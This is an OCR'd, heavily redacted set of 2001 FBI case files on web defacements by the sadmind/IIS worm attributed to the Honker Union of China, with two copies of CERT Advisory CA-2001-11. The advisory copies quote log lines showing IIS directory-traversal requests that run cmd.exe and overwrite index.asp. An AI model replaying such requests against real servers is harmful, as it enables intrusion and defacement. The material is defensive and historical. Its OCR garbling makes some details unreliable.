Alias(s): Motive: 
Group Affiliation: 

Employer: 


Known Accomplices: 

Equipment used: 
Hardware/configuration 
Operating System: 
Software: 


Impact: 
Compromise of classified information: OU yes UO X no 
Estimated number of computers affected: al 


Estimated dollar loss to date: $400.00 (wage 


aid to 
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To: ee, From: SAC, Seattle @ 


b7E 


Category of Crime: 


Impairment: ~ Theft of Information: 

X Malicious code inserted Classified information compromised 
MO Denial of service Unclassified information compromised 
X Destruction of information/software Passwords obtained 

X Modification of information/software Computer processing time obtained 
Telephone services obtained 
Application software obtained 
Operating software obtained 


OOOOOOO 


Intrusion: 
X Unauthorized access 
[1 Exceeding authorized access 


REMARKS 


On May 14, 2001, the Federal Bureau of Investigation (FBI) Seattle, 
Washington, office received a copy of NIPC Cyber Intrusion Report 051901 004 
42062 reporting the defacement of th web 
pies hens oe omen 

2616 Kwina Road, Bellingham, Washington, 98226, telephone bie 
number on May 14, 2001, from 22:37:06 - 22:38:02 the Lummi 
Nation's web server was infected with the sadmind/IIS worm. The attacker 


originated from Internet Protocol (IP) address 207.71.87.60 via spoofed DNS 
server 208.151.126.140. 


n May 30, 2001, FBI Intelligence Operations Specialist (ros) | He 
conducted a web site and 


eléphonica 


ay 
contacted[ iat Hie place of business regarding the 


complaint. After being advised of the identity of the interviewing IOS and 
the nature of the interview, __—_—| provided the following information: 


On May 7, 2001, an unsuccessful attempt was made by an unknown 
intruder to infect the Lummi Nation's web server with the sadmind/IIS worm. 
On May 14, 2001, the Lummi Nation's web server was successfully infected 
with the worm as evidenced by the content on their web site (IP address 
169.203.16.2) being replac wi derogatory verbiage directed against the 
United States Government. said that he obtained some information bé 
about the worm from the cert.org web site but was frustrated that CERT did b7¢ 


To: counterterror MG From: SAC, Seattle © 


Re: 05/31/2001 b3 
b6 


b7Cc 
bT7E 


not mee information on how to remove the worm from infected machines. 


sent an e-mail message to the at Verio advising 
Verio of the compromise (Verio is the registrant for the Solaris machine 
used to send the sadmind/IIS worm). 


The Lummi Nation's web server runs Windows NT 4.0/Service Pack 6 with 
IIS as its operating system and Symantec as its anti-virus protection. The 
Lummi Business Council has purchased firewall protection butL______lhas not 
yet installed the software on their machines. ae said that an analysiwe 
of the infected server revealed that some files ha een modified and that b7c 
the system was only allowing outgoing traffic through ports 80 and 443. The 
worm overwrote the compromised web server's access tables consequently only 
allowing access to the Internet via protocol 6. [_____] spent approximately 
two days recovering from the May 14, 2001, compromise and several hours 
blocking the May 7, 2001, attempted compromise. 


On May 31, 2001, 10SL_____Jlocated CERT Advisory CA-2001-11 
sadmin/IIS Worm, original release date May 08, 2001, on the www.cert.org web 
site. According to information provided in the advisory, the sadmin/IIs 
worm is a self-propagating malicious code that uses two well known 
vulnerabilities to deface web pages. Based on preliminary analysis, the 
sadmind/IIS worm exploits a vulnerability in Solaris systems and 
subsequently installs software to attack Microsoft IIS web servers. In 
addition, the worm includes a component to propagate itself automatically to 
other vulnerable Solaris systems. It will add "+ +" to the .rhosts file in 
the root user's home directory. Finally, the worm will modify the 
index.html on the host Solaris System after compromising 2,000 IIS systems. 
Microsoft IIS servers that are successfully compromised exhibit the modified 
web pages that read as follows: 

fuck USA Government 
fuck PoizonBOx 


contact :sysadmcn@yahoo.com.cn 


151] 1.801 bé 
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fe Lummi Nation @ 


Page 1 of 1 


“ty 
x 
Ho 


Zo. Lummi Nation 
"Related by fountly, alture, and history 


S% SESE SESE SESS SESE SESS ISS SS SS K| aoe 


The Lummi Nation is located adjacent to Whatcom County, in the northwest corner of Washington 
State. Lummi is 8 miles west of the city of Bellingham, and 100 miles north of Seattle. 

Although Lummi is 20 miles south of the U.S.-Canadian border, there is no border for Native 
Americans related by family, culture, and history. The reservation occupies over 12,500 acres of land 
on two peninsulas. The tribe holds 8,000 acres of Puget Sound tidelands surrounding the reservation. 


Size: 12,500 Acres 
8,000 Acres Tidelands 
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Strait of Georgia 


Usual and Accustomed Fishing Area: 


Canadian border to Seattle 


Economic Development: Salmon and shellfish 
hatcheries, seafood processing plant, convenience store, 
marina, foreign trade zone. 


Education: Head Start, Elementary, Junior (Middle) 
School, High School, and Northwest Indian College. 


Natural Resources: Salmon, Crab, Clams, Oysters, 
Herring, Forestry, Agricultural Land, Ground and 
Surface Water, Tribal Tidelands,, 


Government: Self-Governance Tribe under an 11 
member Lummi Indian Business Council elected by a 
General Council of all enrolled members. 


2114 
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CERT® Advisory CA-2001-11 sadmind 


Original release date: May 08, 2001 
Last revised: May 10, 2001 
Source: CERT/CC 


A complete revision history is at the end of this file. 


Systems Affected 


e Systems running unpatched versions of Microsoft IIS 
e Systems running unpatched versions of Solaris up to, and including, Solaris 7 


Overview 


The CERT/CC has received reports of a new piece of self-propagating malicious code (referred t 
worm uses two well-known vulnerabilities to compromise systems and deface web pages. 


I. Description 


Based on preliminary analysis, the sadmind/IIS worm exploits a vulnerability in Solaris systems a 
Microsoft IIS web servers. In addition, it includes a component to propagate itself automatically tc 
add "+ +" to the .rhosts file in the root user’s home directory. Finally, it will modify the index.html c 
compromising 2,000 IIS systems. 


To compromise the Solaris systems, the worm takes advantage of a two-year-old buffer overflow 
program. For more information on this vulnerability, see 


hitp:/Awww.kb.cert.org/vuls/id/28934 
hitp:/Awww.cert.org/advisories/CA-1999-16.html 


After successfully compromising the Solaris systems, it uses a severn-month-old vulnerability to cc 
information about this vulnerability, see 


http:/Avww.kb.cert.org/vuls/id/111677 


Solaris systems that are successfully compromised via the worm exhibit the following characteris 


@ Sample syslog entry from compromised Solaris system 


May 7 02:40:01 carrier.example.com inetd[139]: /usr/sbin/sadmind: Bus Errox - core dumped 

May 7 02:40:01 carrier.example.com last message repeated 1 time 

May 7 02:40:03 carrier.example.com last message repeated 1 time 

May 7 02:40:06 carrier.example.com inetd[{139]: /usx/sbin/sadmind: Segmentation Fault - core dumped 
May 7 02:40:03 carrier.example.com last message repeated 1 time 

May 7 02:40:06 carrier.example.com inetd{139]: /usr/sbin/sadmind: Segmentation Fault - core dumped 
May 7 02:40:08 carrier.example.com inetd(139]: /usxr/sbin/sadmind: Hangup 

May 7 02:40:08 carrier.example.com last message repeated 1 time 

May 7 02:44:14 carrier.example.com inetd{139]: /usr/sbin/sadmind: Killed 
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Related 

Sites e Arootshell listening on TCP port 600 
SECURITY e Existence of the directories 
ALLIANCE 


o /dev/cub contains logs of compromised machines 
o /dev/cuc contains tools that the worm uses to operate and propagate 


e Running processes of the scripts associated with the worm, such as the following: 
o /bin/sh /dev/cuc/sadmin.sh 

/dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111 

o /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80 

© /bin/sh /dev/cuc/uniattack.sh 

o /bin/sh /dev/cuc/time.sh 
e) 
oO 


Oo 


/usr/sbin/inetd -s /tmp/.f 
/bin/sleep 300 


Microsoft IIS servers that are successfully compromised exhibit the following characteristics: 


* Modified web pages that read as follows: 


fuck USA Government 
fuck PoizonBOx 
contact: sysadmen@yahoo.com.cn 


® Sample Log from Attacked IIS Server 


2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 - 
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cemd.exe /c+dir+..\ 2C 
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ 

GE? /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exetroot.exe 502 - 
2003-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ 

GET /scripts/root.exe /c+techo+<HTML code inserted here>.././index.asp 502 ~ 


ll. Impact 


Solaris systems compromised by this worm are being used to scan and compromise other Solari: 
compromised by this worm can suffer modified web content. 


Intruders can use the vulnerabilities exploited by this worm to execute arbitrary code with root pri 
arbitrary commands with the privileges of the IUSR_machinename account on vulnerable Windov 


We are receiving reports of other activity, including one report of files being destroyed on the cor 
them unbootable. It is unclear at this time if this activity is directly related to this worm. 


lll. Solutions 


Apply a patch from your vendor 
A patch is available from Microsoft at 
http://www. microsoft.com/technet/security/bulletin/MS00-078.asp 


For IIS Version 4: 
hitp:/Avww.microsoft.com/ntserver/nts/downloads/critical/g269862/default.asp 
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For lS Version 5: 
htip:/Avww.microsoft.com/windows2000/downloads/critical/q269862/default.as 


Additional advice on securing IIS web servers is available from 


hittp://www.microsoft.com/technet/security/iisSchk.asp 
http:/Awww.microsoft.com/technet/security/tools.asp 


Apply a patch from Sun Microsystems as described in Sun Security Bulletin #00191: 


ub-cai/retrieve.pl? doctype=coll&doc=secbull/191 &type=0&nav=: 


http://sunsolve.sun.com/p 


Appendix A. Vendor Information 


Microsoft Corporation 

The following documents regarding this vulnerability are available from Microsoft: 
htto:/Avww.microsoft.com/technet/security/bulletin/MS00-078.asp 

Sun Microsystems 

Sun has issued the following bulletin for this vulnerability: 


http://sunsolve.sun.com/pub-cgi/retrieve.pl? doctype=coll&doc=secbull/191 &type=0&nav=: 


References 


1. Vulnerability Note VU#111677: Microsoft IIS 4.0/5.0 vulnerable to directory traversal via ¢ 


http:/Awww.kb.cert.org/vuls/id/111677 
2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice AdminSuite Daemon sadmin 


16.html 


Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter, Art Manion, lan Finlay, J 


This document is available from: http:/Avww.cert.org/advisories/CA-2001-11.htm| 


CERT/CC Coniact Information 


Email: cert@cert.org 
Phone: +1 412-268-7090 (24-hour hoiline) 


Fax: +1 412-268-6989 

Postal address: 
CERT Coordination Center 
Software Engineering Institute 
Carnegie Mellon University 
Pittsburgh PA 15213-3890 
U.S.A. 


CERT personnel! answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Fr 
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during other hours, on U.S. holidays, and on weekends. 
Using encryption 
We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is availa 


hitp:/Awww.cert.org/CERT PGP.key 


If you prefer to use DES, please call the CERT hotline for more information. 


Getting security information 


CERT publications and other security information.are available from our web site 


hitp://Awww.cert.org/ 


To subscribe to the CERT mailing list for advisories and bulletins, send email tomajordomo @cert 
message 


subscribe cert-advisory 


* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Offic 


NO WARRANTY 
Any material furnished by Carnegie Mellon University and the Software Engineering Institt 
Carnegie Melton University makes no warranties of any kind, either expressed or implied 4 
limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or res 
Carnegie Mellon University does not make any warranty of any kind with respect to freedo 
infringement. a 


Conditions for use, disclaimers, and sponsorship information 


Copyright 2001 Carnegie Mellon University. 


Revision History 


May 08, 2001: Initial Release 

May 08, 2001: Formatting change to improve printing 

May 08, 2001: Correct link in the vendor section to point to the correct Microsoft Bulletin. 
May 10, 2001: Changed sanitized logs to example.com 
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CERT Advisory CA-2001-11 sadmind/IIS Worm 


Original release date: May 08, 2001 
Last revised: -- 
Source: CERT/CC 


A complete revision history is at the end of this file. 
Systems Affected 


* Systems running unpatched versions of Microsoft IIS 
* Systems running unpatched versions of Solaris up to, and 
including, Solaris 7 


Overview 


The CERT/CC has received reports of a new piece of 
self-propagating 

malicious code (referred to here as the sadmind/IIS worm). The 
worm 

uses two well-known vulnerabilities to compromise systems and 
deface 

web pages. 


I. Description 


Based on preliminary analysis, the sadmind/IIS worm exploits a 

vulnerability in Solaris systems and subsequently installs 
software to 

attack Microsoft IIS web servers. In addition, it includes a 
component 

to propagate itself automatically to other vulnerable Solaris 
systems. 

It will add "+ +" to the .rhosts file in the root user’s home 

directory. Finally, it will modify the index.html on the host 
Solaris 

system after compromising 2,000 IIS systems. 


To compromise the Solaris systems, the worm takes advantage of 
a 

two-year-old buffer overflow vulnerability in the Solstice 
sadmind 

program. For more information on this vulnerability, see 


http: //www.kb.cert.org/vuls/id/28934 
http: //www.cert..org/advisories/CA-1999-16.html 


After successfully compromising the Solaris systems, it uses a 
seven-month-old vulnerability to compromise the IIS systems. 
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For 
additional information about this vulnerability, see 


http: //www.kb.cert.org/vuls/id/111677 


Solaris systems that are successfully compromised via the worm 
exhibit 
the following characteristics: 


*k 


Sample syslog entry from compromised Solaris system 


May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: 

Bus Error - c 

ore dumped 

May 7 02:40:01 carrier.domain.com last message repeated 1 time 

May 7 02:40:03 carrier.domain.com last message repeated 1 time 

May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: 

Segmentation 

Fault - core dumped 

May 7 02:40:03 carrier.domain.com last message repeated 1 time 

May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: 

Segmentation 

Fault - core dumped 

May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: 

Hangup ’ 

May 7 02:40:08 carrier.domain.com last message repeated 1 time 

May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: 

Killed 
* A rootshell listening on TCP port 600 

* Existence of the directories 


* /dev/cub contains logs of compromised machines 
* /dev/cuc contains tools that the worm uses to operate and 
propagate 


Running processes of the scripts associated with the worm, 

such as 
the following: 

* /bin/sh /dev/cuc/sadmin.sh 
/dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111 
/dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80 
/bin/sh /dev/cuc/uniattack.sh 
/bin/sh /dev/cuc/time.sh 
/usr/sbin/inetd -s /tmp/.f 
/bin/sleep 300 


a a a a 


Microsoft IIS servers that are successfully compromised 
exhibit the 
following characteristics: 


* Modified web pages that read as follows: 
fuck USA Government 
fuck PoizonBOx 
contact: sysadmcn@yahoo.com.cn 
* 


Sample Log from Attacked IIS Server 


2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ 

GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 - 
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ 

GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 
200 - 
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ 
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GET /scripts/../../winnt/system32/cmd.exe \ 

/ct+copy+\winnt\system32\cmd.exe+root.exe 502 - 
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ 

GET /scripts/root.exe /c+echot+\ 

&LT;HTML code inserted here>.././index.asp 502 - 


IIT. Impact 


Solaris systems compromised by this worm are being used to 
scan and 

compromise other Solaris and IIS systems. IIS systems 
compromised by 

this worm can suffer modified web content. 


Intruders can use the vulnerabilities exploited by this worm 
to 

execute arbitrary code with root privileges on vulnerable 
Solaris 

systems, and arbitrary commands with the privileges of the 

IUSR_machinename account on vulnerable Windows systems. 


We are receiving reports of other activity, including one 
report of 

files being destroyed on the compromised Windows machine, 
rendering 

them unbootable. It is unclear at this time if this activity 
is 

directly related to this worm. 
TII. Solutions 
Apply a patch from your vendor 


A patch is available from Microsoft at 


http: //www.microsoft.com/technet/security/bulletin/MS00-078.asp 


For IIS Version 4: 


http: //www.microsoft.com/ntserver/nts/downloads/critical/q26986 
2/default.asp 


For IIS Version 5: 


http: //www.microsoft.com/windows2000/downloads/critical/q269862 
/default.asp 


Additional advice on securing IIS web servers is available 
from 


http: //www.microsoft.com/technet/security/iis5chk.asp 
http: //www.microsoft.com/technet/security/tools.asp 


Apply a patch from Sun Microsystems as described in Sun 
Security 
Bulletin #00191: 


http: //sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll &doc=se 
cbu11/191&type=0é&nav=sec.sba 


Appendix A. Vendor Information 
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Microsoft Corporation 
The following documents regarding this vulnerability are 


available 
from Microsoft: 


http: //www.microsoft.com/technet/security/bulletin/MS01-023.as 


Sun Microsystems 


Sun has issued the following bulletin for this vulnerability: 


http: //sunsolve.sun.com/pub-cqi/retrieve.pl?doctype=coll &doc=se 
cbhul1/191l&type=0&nav=sec.sba 


References 


1. Vulnerability Note VU#111677: Microsoft IIS 4.0 / 5.0 
vulnerable 
to directory traversal via extended unicode in url 
(MS00-078) 


http://www.kb.cert.org/vuls/id/111677 
2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice 


AdminSuite Daemon sadmind 


http: //www.cert.org/advisories/CA-1999-16. html 


Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff 
Carpenter, 
Art Manion, Ian Finlay, John Shaffer 


This document is available from: 
http://www. cert.org/advisories/CA-2001-11.htmi 


CERT/CC Contact Information 


Email: cert@cert.org 
Phone: +1 412-268-7090 (24-hour hotline) 
Fax: +1 412-268-6989 
Postal address: 
CERT Coordination Center 
Software Engineering Institute 
Carnegie Mellon University 
Pittsburgh PA 15213-3890 
U.S.A. 


CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / 
EDT (GMT-4) 

Monday through Friday; they are on call for emergencies during 
other 

hours, on U.S. holidays, and on weekends. 


Using encryption 
We strongly urge you to encrypt sensitive information sent by 


email. 
Our public PGP key is available from 


http: //www.cert.org/CERT PGP.key 
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If you prefer to use DES, please call the CERT hotline for 
more 
information. 


Getting security information 


CERT publications and other security information are available 
from 
« our web site 


http: //www.cert.org/ 


To subscribe to the CERT mailing list for advisories and 
bulletins, 

send email to majordomo@cert.org. Please include in the body 
of your 

message 


subscribe cert-advisory 


* "CERT" and "CERT Coordination Center" are registered in the 
U.S. 
. Patent and Trademark Office. 


NO WARRANTY 

Any material furnished by Carnegie Mellon University and the 
Software 

Engineering Institute is furnished on an "as is" basis. 
Carnegie 

Mellon University makes no warranties of any kind, either 
expressed or 

implied as to any matter including, but not limited to, 
warranty of 

fitness for a particular purpose or merchantability, 
exclusivity or 

results obtained from use of the material. Carnegie Mellon 
University 

does not make any warranty of any kind with respect to freedom 
from 

patent, trademark, or copyright infringement. 


Conditions for use, disclaimers, and sponsorship information 
Copyright 2001 Carnegie Mellon University. 


Revision History 
May 08, 2001: Initial Release 


Version: PGPfreeware 5.0i for non-commercial use 
Charset: noconv 
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Subcription/unsubscription/info requests: send e-mail with 


"subscribe", “unsubscribe", or "info" on the first line of the 
message body to discuss-request@blu.org (Subject line is ignored). 


Partial thread listing: 
e CERT Advisory CA-2001-11 
Brian Bay 


o Kris Loranger 
e [Fwd: Re: CERT Advisory CA-2001-11], Brian Bay 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/01/2001 
To: V chi cago Attn: Tx b3 
Counterterrorism Ss. b6 
b7c 
From: Seattle b7E 
Squad 11 


Contact: (206) 262-2438 


Approved 
Drafted By: 


Case ID #3 


Title: HACKER/HONKER UNIO EF CHINA; 
ILLINOIS SECRETARY OF STATE-VICTIM 
INTRUSION 
04/03/2001 


Synopsis: Report Seattle Division Web Page Defacements 


Enclosure(s): Enclosed for receiving office, copies of (1) FD-71 
complaint, (1) NIPC report, (1) victim log file documenting a web 
page defacement, and (1) FD-801. 


Details: During the month of May 2001, several companies in 
Seattle Division territory were the victim of web page 
defacements as a consequence of their receipt of the sadmind/IIsS 
worm. The web page defacements contained identical anti US 
Goverment language and disparaging remarks about PoisonBox. 


The following is a list of known victim companies 
located within the Seattle Division along with their contact 
information: 


— a amenanae of Xeta echnodosies.| | se 


Lummi Indian Business Council, 
2616 Kwina Road, Bellingham, 
Washington, 98226, 


US Network Services, 


neta) 272 East, Suite 200, Seattle, 
ashington, 


b3 
b7E 


To: i ( en e ; 
Re: 06/01/2001 b3 


b7E 


Solid Vertical Domains, Ltd., PMB 624, 11410 NE 124th 
Street, Kirkland, Washington, 98034-4305, (425) 488- 
0378. 


Chicago is encouraged to directly contact the above 
victims if further questions arise. As this case is being 
handled on a national basis by Chicago Division, Seattle Division 
will not open any additional cases relative to these incidents. 


To: Chicago = eee 


b7E 
LEAD (s) : 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO, It 
Take action deemed appropriate. 
Set Lead 2: (Adm) 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
152 1.ec b6 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/13/2001 
To: Chicago Attn: Squad oct 
SA b3 
b6 
From: Washington Field b7Cc 
NS-18, NVRA bIE 
Contact: SA (703) 762-3834 


Approved By: 


Drafted By: 


Case ID #: (Pending) 


Title: Subject: Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To report results of covered lead. 


b6 
Enclosure(s): One copy of FD-302 dated 06/13/2001. ra 
E 
Detaiis: on 06/13/2001, sa[_opoke with[ | 
United States Department of Commerce, to obtain log files for the 
two serv j ! 
Battle"; 
both machines were not logging enabled 
and therefore there are no logs for the computer intrusions. 
(aa a for ESA's webserver (FNS) 
and TA's TAserver4. 
Attached to this EC is a FD-302 containing 
information given to SA by a WFO source concerning b6 
PoizonBOx/Honker's Union of China. b7C 
b3 


lo 7E 


To: Chicago From: ashington Field 
ret [6/22/2004 


LEAD (s): 
Set Lead 1: 
CHICAGO 
AT CHICAGO, ILLINOIS 


Read and clear. 


+4 


b3 
b7 
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a ee 


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 06/01/2001___ 


On May 14, Ot ee City of St. Louis 

faxed some computer logs and an E-mail message eo] 

Assistant Infraguard Coordinator, Federal Bureau of 
Investigation (FBI), about a web defacement at the Water 


Division’s Headquarters, 1640 South Kingshighway, St. Louis, 
Missouri, 63110. 


The E-mail message, which was faxed along with the 


computer logs and an article on web defacements, stated that 
City of St. Louis Water 
Division, had talked to a about a web page defacement 


on Tuesday, May 8, 2001. 
[___Jraa noticed that the City of St. Louis Water 
Division’s web page had been defaced and had a black screen. 
After viewing the website,[ ___| reviewed his fire 
wall logs and located two HTML files an wo asp. files that were 
time stamped at_4:32 pm on Monda May_7, 2001. The asp files 
were unknown tq 


The HTML text revealed what message was supposed to 
have displayed on the screen. The message was supposed to read, 
“fuck USA Government, fuck PoizonBOx, contact 
sysadmcn@yahoo.com.cn”. 


opined that the text was not printed on the 
screen, because the Water Division does not use Outlook to run 
its web pages or E-mail. 


Investigationon 05/14/2001 at St. Louis, Missouri 


File Date dictated 05/18/2001 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 06/11/2001 


On May 17, 2001, Special Agent (SA) 


Federal Bureau of Investigation (FBI St. Louirs Division, met 
Wek Deity of st. Louis 
Water Division, at his office to discuss information about a web 
defacement which had been faxed to the St. Louis Division. 
advised that there had been no further incidents of web 


defacement to the system. 

both checked the file 
transfer protocol (FTP), and determined that it was not in 
service. Pe Joes concerned as to how the web defacement 
took place since the fire wall logs do not show any type of 
activity. 


with the City of St. Louis 
Water Division, told that he had viewed the City of 
St. Louis City Hall’s web site and they also had a black screen. 

was aware that the City Hall used Groupwise rather than 
Outlook which might further explain and confirm that Outlook was 
needed to view the text of the message from the hackers. 


. [| advised sal | that after he located an 
article about the web defacement of the University of Missouri 
St. Louis’ website, which had the exact same text, he assumed 
that it was the same script. 


% [haa addressed the web defacement and wanted 
to make the St. Louis Division aware of it because other victims 
had been contacting the FBI. 


Investigationon 05/17/2001 at St. Louis, Missouri 


ed eases 05/18/2001 


by SA 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 06/01/2001 


St. Louis 
Bridge Company, 655 Landmark Drive, Arnold, Missouri, 63010, 
telephone number was contacted by Special Agent 
(SA) Federal Bureau of Investigation, St. Louis 


Division, at his office. After being advised of the identity of 
the interviewing Agent,[____] provided the following information: 


had completed and submitted a cyber threat and 
computer intrusion incident report to the National Infrastructure 
Protection Center (NIPC), Washington, D. C. The NIPC Watch and 
Warning Unit then forwarded the report to the St. Louis Division. 
eal Jeontactea| tc set up an interview about the 
incident. 


On May 17, 2001, SAL___]met with[____]to discuss the 
intrusion incident. The web defacement was of the intranet, 


which concerned since most intranets are not normally 
affected by an outside attacker. [| __|believed that the attack 
took place as part of a File Transfer Protocol (FTP). 


SA then reviewed the incident report which Blase 
had filled out. had advised that the Sadmind IIS/worm was 
responsible for the defacement on the internal website. 


[naa provided a copy of the defaced website which 
saA[___|was familiar with from other web defacements. The 
message was "fuck USA Government, fuck PoizonBOx, contact: 
sysadmcn@yahoo.com.cn". 


provided sal___]with a zip disk containing the 
logs as well as the numerous IP addresses associated with the 
attack. [____J]also provided SA with several documents of 
his IP address queries at www.apnic.net. 


The server which was attacked contained banking 
information of St. Louis Bridge, bidding documents on projects, 
employee data to include names, addresses, and telephone numbers. 
The main server attacked crashed from the intrusion. There was 
an attempt in the script written by the attackers to destroy the 
hard drive. User accounts to the system had also been deleted. 

had been able to bring the network back on-line with 


Investigationon 05/17/2001 at St. Louis, Missouri 


Date dictated 05/23/2001 
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intrusion evaluation software. [_Jhaa a more current version 
of the network intrusion evaluation software, but had not 
installed it prior to the attack. 


provided five IP addresses that he located in the 
logs and their purposes in the attack are as follows: 


On May 2, 2001, 210.83.109.119 ran a cmd.exe for 
command executable script on the system. 


On May 2, 2001, IP address 62.226.241.1 caused the 
erash of the network server. 


On May 2, 2001, IP address 202.108.18.5 was uploading 
to the server looking for passwords. 


On May 4, 2001, IP address 211.159.23.170 was also 
running scripts on the network server. 


On May 5, IP address 202.97.205.4 ran attack scripts on 
Blase’s network system. 


had drafted a letter explaining the attack and 
included it with the incident report forwarded to the NIPC Watch 
Center. 


After reviewing his system,[___]adiscovered the ver 
first intrusion into the system was on March 24, 2001. 
then noticed another intrusion into the system on April 7, 2001. 
The attack took place in the month of May 2001. 


[was able to locate a back door program written by 
the attacker for_re-entrance into the system. The program was 


named Kaitenz. used a back up tape to help recover his 
server and the back up of the system caused some of the 
information to be lost. advised that the assessment as far 


as monetary damage was in the range of $3,000.00 to $5,000.00. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/30/2001 
To: Chicago Attn: SA 
Counter terrorism Ss 


From: New York 
C-37 
Contact: SA 


212-384-4039 
Approved By: 
Drafted By: 


Case ID #: 


g 
(Pending) 


Title: HACKER HONKER UNION OF CHINA; 
CHICAGO SYSTEMS GROUP - VICTIM; 
IP/C 
00:CG 


Synopsis: To advise of New York action on captioned matter. 
Admini ive: Reference telephone call between SA 


and SA on _ 05/07/2001. Reference telephone call between SSA 
on 05/30/01. Reference EC from 


Chicago dated 05/12/01. 


Details: All victims in captioned case were dealt with 
telephonically, and instructed to maintain a copy of all relevant 
logs concerning the web defacement incidents. The victims were 
advised that they may be contacted by the Chicago office in the 
future if deemed necessary. The New York Office provided the 
contact information to Chicago for this purpose. 


The New York Office is advising Chicago that it sees no issue 
with the Chicago Case Agent contacting the victims directly at 
this early investigative stage. Should this case eventually be 
prosecuted and chain of custody becomes an issue, the New York 
Office will then assist Chicago as necessary by retrieving any 
other evidence from victim companies. 


New York considers this matter RUC. 


+¢ 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/13/2001 


To: behicago - Attn: SA 
(312) 431-1333 


From: San Francisco 
14B/Hayward RA 
Contact: SA 


(510) 886-7447 
Approved By: 
Drafted By: 
Case ID #: 
Title: Honkers Union of China 


Synopsis: Forward materials from victims in the San Francisco 
Division of web defacements originating in China. 


Reference: Groupwise e-mail fron[ ______itto NIPC Supv., 
dated May 2, 2001, 7:07 AM, Subject: Honkers Union of Chinal ——] 
[~~] signea’ssaf—_] NIPC Computer 


Investigations Unit. 
Enclosures: Ten (10) victim information documents. 


Details: The San Francisco Division is forwarding the enclosed 
victim information/materials to the Chicago Division, case file 

The materials include FD-71’s, e-mails, and NIPC 
Watch Reports from victim companies. In some cases, logs, copies 
of the defacement, and other information provided by the victims 
is provided. 


The San Francisco Division will continue to forward 
victims/information as necessary. 


e are any questions or comments, contact SA 
Hayward RA, (510) 886-7447. 
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To: Chicago eon san Francisco 
Rei LY 06/13/2001 


» 


LEAD (‘s): 
Set Lead 1: 
CHICAGO 
AT CHICAGO 


Read and Clear 


+4 
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T'd WLOL & 


‘ Subject: Description of computer attack 


Elements of Crime 


My web server was contacted by the IP 202.97.205.3 and a known exploit was used 


against us to install a rootkit known as Backgate http://www.sans.org/y2k/unicode, htm. 


Our web site was defaced, but no permanent damage was done. I have cleaned up the 
mess and patched our server to prevent future breakins. 


Please contact me for any further assistance and also keep me updated to the status of the 
investigation. 


Proact b7C 


a 
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NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: [J Negative LJ See below 


Subject's name and aliases 


UNSUB (S) aan! Computer Intrusion 


| cca ac Source 


Complaint received 


[J Personal [I Telephonic Date05-17-2001 Time 11:4 pam 


Address of Subject Complainant's address and telephone number 


INTERNET PROVIDER address 1186 Cielo Circle 
“TP” 202.204.113.13 Rhonert Park, CA 94925 


FO 


Scars, marks and other data 


Subject’s 
Description 


Employer Address Telephone 


Vehicle Description 


Facts of Complaint 
of The Fairy Company.com from 


which he and_his sell fairy figures. On Friday, May 
10, 2001, business experienced an interruption of service at 
their website. Apparently someone “hacked into” the website and altered 
the screen to solid red. The interruption continued for 9 days. On 
Wednesday, May 10, 2001 at approximately 8:14 pm, company 
experienced another interruption of service. Once again the screen was 
red and it contained the words “fuck the US Government”. 

explained that he determined that the hacker utilized IP address 
202.204.113.13 to access the Internet and hack into his business website. 


Do not write in this space. 


(Complaint received by) BLOCK STAMP 


Web site hacking tie cos con acta ee OD ae net ees. eee 


From: 
To; : 
Date: Thu, May 17, 2001 12:02 AM 
Subject: Web site hacking 
dba Jacobs Farm del Cabo, Stageroad, Pescadero, CA, phone # 650-879-2239 4_k | bb 
b7c 


south of half moon bay) called to state that his web site server has been attacked three times in the last 
couple of days with some placing on his web site the following message: 


"fuck U.S.A. government" 
